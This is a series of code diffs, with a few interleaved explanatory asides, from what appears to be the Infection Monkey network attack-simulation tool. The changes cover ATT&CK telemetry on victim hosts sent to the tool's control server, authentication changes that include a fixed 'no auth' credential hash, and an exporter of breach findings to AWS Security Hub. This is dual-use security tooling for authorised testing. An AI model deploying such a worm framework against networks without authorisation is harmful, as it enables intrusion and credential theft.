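Because it is easy to miss one of the binaries listed above before running build_linux.sh or build_windows.bat, here is an illustrative pre-build check. It is not part of the repository; the file names are taken from the sections above and the bin directory path is assumed to be relative to the source checkout.

import os

# Hypothetical helper: verify the standalone binaries described above were placed
# under infection_monkey/bin before building the monkey.
REQUIRED_BINARIES = [
    'sc_monkey_runner32.so', 'sc_monkey_runner64.so',  # Sambacry runners
    'mk32.zip', 'mk64.zip',                            # password-protected Mimikatz DLL zips
    'traceroute32', 'traceroute64',                    # standalone traceroute builds
]


def missing_binaries(bin_dir='infection_monkey/bin'):
    # Return the required files that are not present in bin_dir.
    return [name for name in REQUIRED_BINARIES
            if not os.path.isfile(os.path.join(bin_dir, name))]


if __name__ == '__main__':
    print(missing_binaries() or 'all prerequisite binaries are in place')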
@@ -1,6 +1,6 @@
enum34
impacket
-PyCrypto
+pycryptodome
pyasn1
cffi
twisted
@@ -14,4 +14,7 @@ six
ecdsa
netifaces
ipaddress
wmi
+pymssql
+pyftpdlib
+enum34
@@ -0,0 +1,21 @@
enum34
impacket
pycryptodome
pyasn1
cffi
twisted
rdpy
requests
odict
paramiko
psutil==3.4.2
PyInstaller
six
ecdsa
netifaces
ipaddress
wmi
pywin32
pymssql
pyftpdlib
enum34
@@ -1,6 +1,6 @@
import logging

-from common.cloud.aws import AWS
+from common.cloud.aws_instance import AwsInstance

__author__ = 'itay.mizeretz'

@@ -15,7 +15,7 @@ class AwsCollector(object):
    @staticmethod
    def get_aws_info():
        LOG.info("Collecting AWS info")
-        aws = AWS()
+        aws = AwsInstance()
        info = {}
        if aws.is_aws_instance():
            LOG.info("Machine is an AWS instance")
@@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
        """
        LOG.debug("Running Windows collector")
        super(WindowsInfoCollector, self).get_info()
-        self.get_wmi_info()
+        #self.get_wmi_info()
        self.get_installed_packages()
        from infection_monkey.config import WormConfiguration
        if WormConfiguration.should_use_mimikatz:
@@ -0,0 +1 @@
__author__ = 'VakarisZ'
@@ -0,0 +1,41 @@
from infection_monkey.config import WormConfiguration, GUID
import requests
import json
from infection_monkey.control import ControlClient
import logging

__author__ = "VakarisZ"

LOG = logging.getLogger(__name__)


class AttackTelem(object):

    def __init__(self, technique, status, data=None):
        """
        Default ATT&CK telemetry constructor
        :param technique: Technique ID. E.g. T111
        :param status: int from ScanStatus Enum
        :param data: Other data relevant to the attack technique
        """
        self.technique = technique
        self.result = status
        self.data = {'status': status, 'id': GUID}
        if data:
            self.data.update(data)

    def send(self):
        """
        Sends telemetry to island
        """
        if not WormConfiguration.current_server:
            return
        try:
            requests.post("https://%s/api/attack/%s" % (WormConfiguration.current_server, self.technique),
                          data=json.dumps(self.data),
                          headers={'content-type': 'application/json'},
                          verify=False,
                          proxies=ControlClient.proxies)
        except Exception as exc:
            LOG.warn("Error connecting to control server %s: %s",
                     WormConfiguration.current_server, exc)
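A minimal usage sketch (not part of the commit) of the class above, as a monkey-side caller might use it; the technique ID and the status value are placeholders, and real callers are expected to pass a value from the ScanStatus enum mentioned in the docstring.

# Hypothetical call site: report that technique T1111 was used against a victim.
telem = AttackTelem('T1111', 1, data={'machine': '10.0.0.4'})  # 1 stands in for a ScanStatus value
telem.send()  # POSTs {'status': 1, 'id': GUID, 'machine': '10.0.0.4'} to https://<island>/api/attack/T1111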
@@ -0,0 +1,18 @@
from infection_monkey.transport.attack_telems.base_telem import AttackTelem

__author__ = "VakarisZ"


class VictimHostTelem(AttackTelem):

    def __init__(self, technique, status, machine, data=None):
        """
        ATT&CK telemetry that parses and sends VictimHost's (remote machine's) data
        :param technique: Technique ID. E.g. T111
        :param status: int from ScanStatus Enum
        :param machine: VictimHost obj from model/host.py
        :param data: Other data relevant to the attack technique
        """
        super(VictimHostTelem, self).__init__(technique, status, data)
        victim_host = {'hostname': machine.domain_name, 'ip': machine.ip_addr}
        self.data.update({'machine': victim_host})
@@ -1,5 +1,6 @@
import os
import sys
+import shutil
import struct

from infection_monkey.config import WormConfiguration
@@ -35,3 +36,25 @@ def utf_to_ascii(string):
    # Converts utf string to ascii. Safe to use even if string is already ascii.
    udata = string.decode("utf-8")
    return udata.encode("ascii", "ignore")
+
+
+def create_monkey_dir():
+    """
+    Creates directory for monkey and related files
+    """
+    if not os.path.exists(get_monkey_dir_path()):
+        os.mkdir(get_monkey_dir_path())
+
+
+def remove_monkey_dir():
+    """
+    Removes monkey's root directory
+    """
+    shutil.rmtree(get_monkey_dir_path(), ignore_errors=True)
+
+
+def get_monkey_dir_path():
+    if is_windows_os():
+        return WormConfiguration.monkey_dir_windows
+    else:
+        return WormConfiguration.monkey_dir_linux
@@ -18,14 +18,19 @@ from cc.resources.log import Log
from cc.resources.island_logs import IslandLog
from cc.resources.monkey import Monkey
from cc.resources.monkey_configuration import MonkeyConfiguration
+from cc.resources.island_configuration import IslandConfiguration
from cc.resources.monkey_download import MonkeyDownload
from cc.resources.netmap import NetMap
from cc.resources.node import Node
+from cc.resources.remote_run import RemoteRun
from cc.resources.report import Report
from cc.resources.root import Root
from cc.resources.telemetry import Telemetry
from cc.resources.telemetry_feed import TelemetryFeed
+from cc.resources.pba_file_download import PBAFileDownload
from cc.services.config import ConfigService
+from cc.resources.pba_file_upload import FileUpload
+from cc.resources.attack_telem import AttackTelem

__author__ = 'Barak'

@@ -104,6 +109,7 @@ def init_app(mongo_url):
    api.add_resource(ClientRun, '/api/client-monkey', '/api/client-monkey/')
    api.add_resource(Telemetry, '/api/telemetry', '/api/telemetry/', '/api/telemetry/<string:monkey_guid>')
    api.add_resource(MonkeyConfiguration, '/api/configuration', '/api/configuration/')
+    api.add_resource(IslandConfiguration, '/api/configuration/island', '/api/configuration/island/')
    api.add_resource(MonkeyDownload, '/api/monkey/download', '/api/monkey/download/',
                     '/api/monkey/download/<string:path>')
    api.add_resource(NetMap, '/api/netmap', '/api/netmap/')
@@ -113,5 +119,11 @@ def init_app(mongo_url):
    api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
    api.add_resource(Log, '/api/log', '/api/log/')
    api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
+    api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
+    api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
+                     '/api/fileUpload/<string:file_type>?load=<string:filename>',
+                     '/api/fileUpload/<string:file_type>?restore=<string:filename>')
+    api.add_resource(RemoteRun, '/api/remote-monkey', '/api/remote-monkey/')
+    api.add_resource(AttackTelem, '/api/attack/<string:technique>')

    return app
@@ -33,20 +33,18 @@ def init_jwt(app):
        user_id = payload['identity']
        return userid_table.get(user_id, None)

-    if env.is_auth_enabled():
-        JWT(app, authenticate, identity)
+    JWT(app, authenticate, identity)


def jwt_required(realm=None):
    def wrapper(fn):
        @wraps(fn)
        def decorator(*args, **kwargs):
-            if env.is_auth_enabled():
-                try:
-                    _jwt_required(realm or current_app.config['JWT_DEFAULT_REALM'])
-                except JWTError:
-                    abort(401)
-            return fn(*args, **kwargs)
+            try:
+                _jwt_required(realm or current_app.config['JWT_DEFAULT_REALM'])
+                return fn(*args, **kwargs)
+            except JWTError:
+                abort(401)

        return decorator
@@ -39,7 +39,7 @@ class Encryptor:
    def enc(self, message):
        cipher_iv = Random.new().read(AES.block_size)
        cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv)
-        return base64.b64encode(cipher_iv + cipher.encrypt(self._pad(message)))
+        return base64.b64encode(cipher_iv + cipher.encrypt(str(self._pad(message))))  # cipher.encrypt expects str

    def dec(self, enc_message):
        enc_message = base64.b64decode(enc_message)
@@ -1,6 +1,7 @@
import abc
from datetime import timedelta
import os
+from Crypto.Hash import SHA3_512

__author__ = 'itay.mizeretz'

@@ -13,6 +14,12 @@ class Environment(object):
    _DEBUG_SERVER = False
    _AUTH_EXPIRATION_TIME = timedelta(hours=1)

+    def __init__(self):
+        self.config = None
+
+    def set_config(self, config):
+        self.config = config
+
    def get_island_port(self):
        return self._ISLAND_PORT

@@ -25,9 +32,10 @@ class Environment(object):
    def get_auth_expiration_time(self):
        return self._AUTH_EXPIRATION_TIME

-    @abc.abstractmethod
-    def is_auth_enabled(self):
-        return
+    def hash_secret(self, secret):
+        h = SHA3_512.new()
+        h.update(secret)
+        return h.hexdigest()

    @abc.abstractmethod
    def get_auth_users(self):
@@ -1,6 +1,7 @@
import cc.auth
from cc.environment import Environment
-from common.cloud.aws import AWS
+from common.cloud.aws_instance import AwsInstance
+from Crypto.Hash import SHA3_512

__author__ = 'itay.mizeretz'

@@ -8,16 +9,17 @@ __author__ = 'itay.mizeretz'
class AwsEnvironment(Environment):
    def __init__(self):
        super(AwsEnvironment, self).__init__()
-        self._instance_id = AwsEnvironment._get_instance_id()
+        self.aws_info = AwsInstance()
+        self._instance_id = self._get_instance_id()
+        self.region = self._get_region()

-    @staticmethod
-    def _get_instance_id():
-        return AWS.get_instance_id()
+    def _get_instance_id(self):
+        return self.aws_info.get_instance_id()

-    def is_auth_enabled(self):
-        return True
+    def _get_region(self):
+        return self.aws_info.get_region()

    def get_auth_users(self):
        return [
-            cc.auth.User(1, 'monkey', self._instance_id)
+            cc.auth.User(1, 'monkey', self.hash_secret(self._instance_id))
        ]
@@ -1,27 +1,40 @@
import json
import logging
-import standard
-import aws
+from cc.environment import standard
+from cc.environment import aws
+from cc.environment import password
+
+__author__ = 'itay.mizeretz'

logger = logging.getLogger(__name__)

+AWS = 'aws'
+STANDARD = 'standard'
+PASSWORD = 'password'
+
ENV_DICT = {
-    'standard': standard.StandardEnvironment,
-    'aws': aws.AwsEnvironment
+    STANDARD: standard.StandardEnvironment,
+    AWS: aws.AwsEnvironment,
+    PASSWORD: password.PasswordEnvironment,
}


-def load_env_from_file():
+def load_server_configuration_from_file():
    with open('monkey_island/cc/server_config.json', 'r') as f:
        config_content = f.read()
-    config_json = json.loads(config_content)
+    return json.loads(config_content)
+
+
+def load_env_from_file():
+    config_json = load_server_configuration_from_file()
    return config_json['server_config']


try:
-    __env_type = load_env_from_file()
+    config_json = load_server_configuration_from_file()
+    __env_type = config_json['server_config']
    env = ENV_DICT[__env_type]()
+    env.set_config(config_json)
    logger.info('Monkey\'s env is: {0}'.format(env.__class__.__name__))
except Exception:
    logger.error('Failed initializing environment', exc_info=True)
@@ -0,0 +1,12 @@
from cc.environment import Environment
import cc.auth

__author__ = 'itay.mizeretz'


class PasswordEnvironment(Environment):

    def get_auth_users(self):
        return [
            cc.auth.User(1, self.config['user'], self.config['hash'])
        ]
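A hedged sketch (not from the diff) of how credentials for this new password environment could be produced: it mirrors Environment.hash_secret above (SHA3-512 via pycryptodome) and prints a server_config.json-shaped document. The file layout with 'server_config', 'user' and 'hash' keys is inferred from load_server_configuration_from_file(), env.set_config() and PasswordEnvironment, so treat it as an assumption.

import json

from Crypto.Hash import SHA3_512  # pycryptodome, same primitive as Environment.hash_secret


def make_password_server_config(user, plaintext_password):
    # Hash the password the way the island hashes secrets (see hash_secret above).
    # Under Python 3 the secret would need to be encoded to bytes first.
    h = SHA3_512.new()
    h.update(plaintext_password)
    # Assumed layout of monkey_island/cc/server_config.json for the password environment:
    # PasswordEnvironment reads self.config['user'] and self.config['hash'].
    return json.dumps({'server_config': 'password', 'user': user, 'hash': h.hexdigest()}, indent=2)


print(make_password_server_config('monkey-admin', 'a-long-passphrase'))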
@@ -1,12 +1,15 @@
+import cc.auth
from cc.environment import Environment

__author__ = 'itay.mizeretz'


class StandardEnvironment(Environment):
-    def is_auth_enabled(self):
-        return False
+    # SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
+    NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
+                    '8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'

    def get_auth_users(self):
-        return []
+        return [
+            cc.auth.User(1, StandardEnvironment.NO_AUTH_CREDS, StandardEnvironment.NO_AUTH_CREDS)
+        ]
@@ -0,0 +1,19 @@
from cc.environment.environment import load_env_from_file, AWS
from cc.report_exporter_manager import ReportExporterManager
from cc.resources.aws_exporter import AWSExporter

__author__ = 'maor.rayzin'


def populate_exporter_list():

    manager = ReportExporterManager()
    if is_aws_exporter_required():
        manager.add_exporter_to_list(AWSExporter)


def is_aws_exporter_required():
    if str(load_env_from_file()) == AWS:
        return True
    else:
        return False
@@ -18,6 +18,7 @@ json_setup_logging(default_path=os.path.join(BASE_PATH, 'cc', 'island_logger_def
logger = logging.getLogger(__name__)

from cc.app import init_app
+from cc.exporter_init import populate_exporter_list
from cc.utils import local_ip_addresses
from cc.environment.environment import env
from cc.database import is_db_server_up
@@ -34,6 +35,7 @@ def main():
        logger.info('Waiting for MongoDB server')
        time.sleep(1)

+    populate_exporter_list()
    app = init_app(mongo_url)
    if env.is_debug():
        app.run(host='0.0.0.0', debug=True, ssl_context=('monkey_island/cc/server.crt', 'monkey_island/cc/server.key'))
@@ -44,6 +46,7 @@ def main():
    http_server.listen(env.get_island_port())
    logger.info(
        'Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port()))
+
    IOLoop.instance().start()
@@ -0,0 +1,34 @@
import logging

__author__ = 'maor.rayzin'

logger = logging.getLogger(__name__)


class Singleton(type):
    _instances = {}

    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
        return cls._instances[cls]


class ReportExporterManager(object):
    __metaclass__ = Singleton

    def __init__(self):
        self._exporters_set = set()

    def get_exporters_list(self):
        return self._exporters_set

    def add_exporter_to_list(self, exporter):
        self._exporters_set.add(exporter)

    def export(self, report):
        try:
            for exporter in self._exporters_set:
                exporter().handle_report(report)
        except Exception as e:
            logger.exception('Failed to export report')
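As an illustration of this manager's API (not part of the commit), a custom exporter could be plugged in the same way exporter_init.py registers AWSExporter; it subclasses the Exporter base class that this commit also introduces.

from cc.report_exporter_manager import ReportExporterManager
from cc.resources.exporter import Exporter


class LogExporter(Exporter):
    # Hypothetical exporter: only reports how many machines have issues.
    @staticmethod
    def handle_report(report_json):
        issues = report_json.get('recommendations', {}).get('issues', {})
        print('report contains issues for %d machines' % len(issues))
        return True


# ReportExporterManager uses the Singleton metaclass above, so this is the same
# instance that populate_exporter_list() fills when main.py starts the island.
ReportExporterManager().add_exporter_to_list(LogExporter)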
@@ -0,0 +1,24 @@
import flask_restful
from flask import request
import json
from cc.services.attack.attack_telem import set_results
import logging

__author__ = 'VakarisZ'

LOG = logging.getLogger(__name__)


class AttackTelem(flask_restful.Resource):
    """
    ATT&CK endpoint used to retrieve matrix related info from monkey
    """

    def post(self, technique):
        """
        Gets ATT&CK telemetry data and stores it in the database
        :param technique: Technique ID, e.g. T1111
        """
        data = json.loads(request.data)
        set_results(technique, data)
        return {}
@@ -0,0 +1,411 @@
import logging
import uuid
from datetime import datetime
import boto3
from botocore.exceptions import UnknownServiceError

from cc.resources.exporter import Exporter
from cc.services.config import ConfigService
from cc.environment.environment import load_server_configuration_from_file
from common.cloud.aws_instance import AwsInstance

__author__ = 'maor.rayzin'


logger = logging.getLogger(__name__)

AWS_CRED_CONFIG_KEYS = [['cnc', 'aws_config', 'aws_access_key_id'],
                        ['cnc', 'aws_config', 'aws_secret_access_key'],
                        ['cnc', 'aws_config', 'aws_account_id']]


class AWSExporter(Exporter):

    @staticmethod
    def handle_report(report_json):
        aws = AwsInstance()
        findings_list = []
        issues_list = report_json['recommendations']['issues']
        if not issues_list:
            logger.info('No issues were found by the monkey, no need to send anything')
            return True
        for machine in issues_list:
            for issue in issues_list[machine]:
                if issue.get('aws_instance_id', None):
                    findings_list.append(AWSExporter._prepare_finding(issue, aws.get_region()))

        if not AWSExporter._send_findings(findings_list, AWSExporter._get_aws_keys(), aws.get_region()):
            logger.error('Exporting findings to aws failed')
            return False

        return True

    @staticmethod
    def _get_aws_keys():
        creds_dict = {}
        for key in AWS_CRED_CONFIG_KEYS:
            creds_dict[key[2]] = str(ConfigService.get_config_value(key))

        return creds_dict

    @staticmethod
    def merge_two_dicts(x, y):
        z = x.copy()  # start with x's keys and values
        z.update(y)  # modifies z with y's keys and values & returns None
        return z

    @staticmethod
    def _prepare_finding(issue, region):
        findings_dict = {
            'island_cross_segment': AWSExporter._handle_island_cross_segment_issue,
            'ssh': AWSExporter._handle_ssh_issue,
            'shellshock': AWSExporter._handle_shellshock_issue,
            'tunnel': AWSExporter._handle_tunnel_issue,
            'elastic': AWSExporter._handle_elastic_issue,
            'smb_password': AWSExporter._handle_smb_password_issue,
            'smb_pth': AWSExporter._handle_smb_pth_issue,
            'sambacry': AWSExporter._handle_sambacry_issue,
            'shared_passwords': AWSExporter._handle_shared_passwords_issue,
            'wmi_password': AWSExporter._handle_wmi_password_issue,
            'wmi_pth': AWSExporter._handle_wmi_pth_issue,
            'ssh_key': AWSExporter._handle_ssh_key_issue,
            'rdp': AWSExporter._handle_rdp_issue,
            'shared_passwords_domain': AWSExporter._handle_shared_passwords_domain_issue,
            'shared_admins_domain': AWSExporter._handle_shared_admins_domain_issue,
            'strong_users_on_crit': AWSExporter._handle_strong_users_on_crit_issue,
            'struts2': AWSExporter._handle_struts2_issue,
            'weblogic': AWSExporter._handle_weblogic_issue,
            'hadoop': AWSExporter._handle_hadoop_issue,
            # azure and conficker are not relevant issues for an AWS env
        }

        configured_product_arn = load_server_configuration_from_file()['aws'].get('sec_hub_product_arn', '')
        product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn)
        instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}'
        account_id = AWSExporter._get_aws_keys().get('aws_account_id', '')

        finding = {
            "SchemaVersion": "2018-10-08",
            "Id": uuid.uuid4().hex,
            "ProductArn": product_arn,
            "GeneratorId": issue['type'],
            "AwsAccountId": account_id,
            "RecordState": "ACTIVE",
            "Types": [
                "Software and Configuration Checks/Vulnerabilities/CVE"
            ],
            "CreatedAt": datetime.now().isoformat() + 'Z',
            "UpdatedAt": datetime.now().isoformat() + 'Z',
        }
        return AWSExporter.merge_two_dicts(finding, findings_dict[issue['type']](issue, instance_arn))

    @staticmethod
    def _send_findings(findings_list, creds_dict, region):
        try:
            if not creds_dict:
                logger.info('No AWS access credentials received in configuration')
                return False

            securityhub = boto3.client('securityhub',
                                       aws_access_key_id=creds_dict.get('aws_access_key_id', ''),
                                       aws_secret_access_key=creds_dict.get('aws_secret_access_key', ''),
                                       region_name=region)

            import_response = securityhub.batch_import_findings(Findings=findings_list)
            if import_response['ResponseMetadata']['HTTPStatusCode'] == 200:
                return True
            else:
                return False
        except UnknownServiceError as e:
            logger.warning('AWS exporter called but AWS-CLI securityhub service is not installed')
            return False
        except Exception as e:
            logger.exception('AWS security hub findings failed to send.')
            return False

    @staticmethod
    def _get_finding_resource(instance_id, instance_arn):
        if instance_id:
            return [{
                "Type": "AwsEc2Instance",
                "Id": instance_arn.format(instance_id=instance_id)
            }]
        else:
            return [{'Type': 'Other', 'Id': 'None'}]

    @staticmethod
    def _build_generic_finding(severity, title, description, recommendation, instance_arn, instance_id=None):
        finding = {
            "Severity": {
                "Product": severity,
                "Normalized": 100
            },
            'Resources': AWSExporter._get_finding_resource(instance_id, instance_arn),
            "Title": title,
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": recommendation
                }
            }}

        return finding

    @staticmethod
    def _handle_tunnel_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=5,
            title="Weak segmentation - Machines were able to communicate over unused ports.",
            description="Use micro-segmentation policies to disable communication other than the required.",
            recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}"
                .format(issue['machine'], issue['dest']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_sambacry_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=10,
            title="Samba servers are vulnerable to 'SambaCry'",
            description="Change {0} password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up."
                .format(issue['username']),
            recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format(
                issue['machine'], issue['ip_address'], issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_smb_pth_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=5,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over SMB protocol with user {2}.".format(
                issue['machine'], issue['ip_address'], issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_ssh_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format(
                issue['machine'], issue['ip_address'], issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_ssh_key_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
            description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']),
            recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format(
                machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_elastic_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=10,
            title="Elastic Search servers are vulnerable to CVE-2015-1427",
            description="Update your Elastic Search server to version 1.4.3 and up.",
            recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format(
                issue['machine'], issue['ip_address']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_island_cross_segment_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Weak segmentation - Machines from different segments are able to communicate.",
            description="Segment your network and make sure there is no communication between machines from different segments.",
            recommendation="The network can probably be segmented. A monkey instance on {0} in the networks {1} could directly access the Monkey Island server in the networks {2}.".format(
                issue['machine'], issue['networks'], issue['server_networks']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_shared_passwords_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Multiple users have the same password",
            description="Some users are sharing passwords, this should be fixed by changing passwords.",
            recommendation="These users are sharing access password: {0}.".format(issue['shared_with']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_shellshock_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=10,
            title="Machines are vulnerable to 'Shellshock'",
            description="Update your Bash to a ShellShock-patched version.",
            recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
                           "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format(
                issue['machine'], issue['ip_address'], issue['port'], issue['paths']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_smb_password_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format(
                issue['machine'], issue['ip_address'], issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_wmi_password_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.",
            recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format(
                machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_wmi_pth_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over WMI protocol with user {username}".format(
                machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_rdp_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine machine ({ip_address}) is vulnerable to a RDP attack. The Monkey authenticated over the RDP protocol with user {username} and its password.".format(
                machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_shared_passwords_domain_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Multiple users have the same password.",
            description="Some domain users are sharing passwords, this should be fixed by changing passwords.",
            recommendation="These users are sharing access password: {shared_with}.".format(
                shared_with=issue['shared_with']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_shared_admins_domain_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Shared local administrator account - Different machines have the same account as a local administrator.",
            description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t an unintentional local admin sharing.",
            recommendation="Here is a list of machines which the account {username} is defined as an administrator: {shared_machines}".format(
                username=issue['username'], shared_machines=issue['shared_machines']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_strong_users_on_crit_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=1,
            title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.",
            description="This critical machine is open to attacks via strong users with access to it.",
            recommendation="The services: {services} have been found on the machine thus classifying it as a critical machine. These users has access to it:{threatening_users}.".format(
                services=issue['services'], threatening_users=issue['threatening_users']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_struts2_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=10,
            title="Struts2 servers are vulnerable to remote code execution.",
            description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
            recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
                           " The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser.".format(
                machine=issue['machine'], ip_address=issue['ip_address']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_weblogic_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=10,
            title="Oracle WebLogic servers are vulnerable to remote code execution.",
            description="Install Oracle critical patch updates. Or update to the latest version. "
                        "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.",
            recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
                           " The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format(
                machine=issue['machine'], ip_address=issue['ip_address']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_hadoop_issue(issue, instance_arn):

        return AWSExporter._build_generic_finding(
            severity=10,
            title="Hadoop/Yarn servers are vulnerable to remote code execution.",
            description="Run Hadoop in secure mode, add Kerberos authentication.",
            recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
                           "The attack was made possible due to default Hadoop/Yarn configuration being insecure.",
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )
@@ -0,0 +1,7 @@
class Exporter(object):
    def __init__(self):
        pass

    @staticmethod
    def handle_report(report_json):
        raise NotImplementedError
@@ -0,0 +1,24 @@
import json

import flask_restful
from flask import request, jsonify, abort

from cc.auth import jwt_required
from cc.services.config import ConfigService


class IslandConfiguration(flask_restful.Resource):
    @jwt_required()
    def get(self):
